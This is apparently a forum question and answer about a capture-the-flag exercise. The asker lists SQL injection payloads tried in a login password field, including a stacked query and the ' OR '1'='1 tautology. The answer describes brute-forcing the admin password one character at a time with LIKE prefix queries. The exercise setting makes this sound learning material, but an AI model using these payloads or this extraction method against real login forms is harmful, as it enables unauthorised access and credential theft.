# SQL Injection - LIKE Clause

Tags: sql-injection, ctf

As part of a capture-the-flag assignment, I'm supposed to perform SQL injection using the LIKE clause to obtain the flag. I'm new to this and I've tried the following injections:

(The username required to login is 'admin', so I've performed the following injections in the password field)

1. `'; SELECT password FROM users WHERE username LIKE 'admin%'; --`
2. `' OR '1'='1`   *(I ignored the LIKE clause)*

I've also tried variants of (1.) but I'm still stuck.

Is there something I'm missing? Any hints would be appreciated!

PS: I don't have the database schema or table layout

Answer (score 3):

You are suposed to bruteforce the password using the following algorithm:

`SELECT  * FROM users where username = "admin" AND password LIKE "A%"; #INCORRECT`

`SELECT  * FROM users where username = "admin" AND password LIKE "B%"; #INCORRECT`

`SELECT  * FROM users where username = "admin" AND password LIKE "C%"; #CORRECT`

`SELECT  * FROM users where username = "admin" AND password LIKE "CA%"; #INCORRECT`

`SELECT  * FROM users where username = "admin" AND password LIKE "CB%"; #INCORRECT`

`SELECT  * FROM users where username = "admin" AND password LIKE "CC%"; #CORRECT`

And so on. You can write a simple python program that does that automatically :)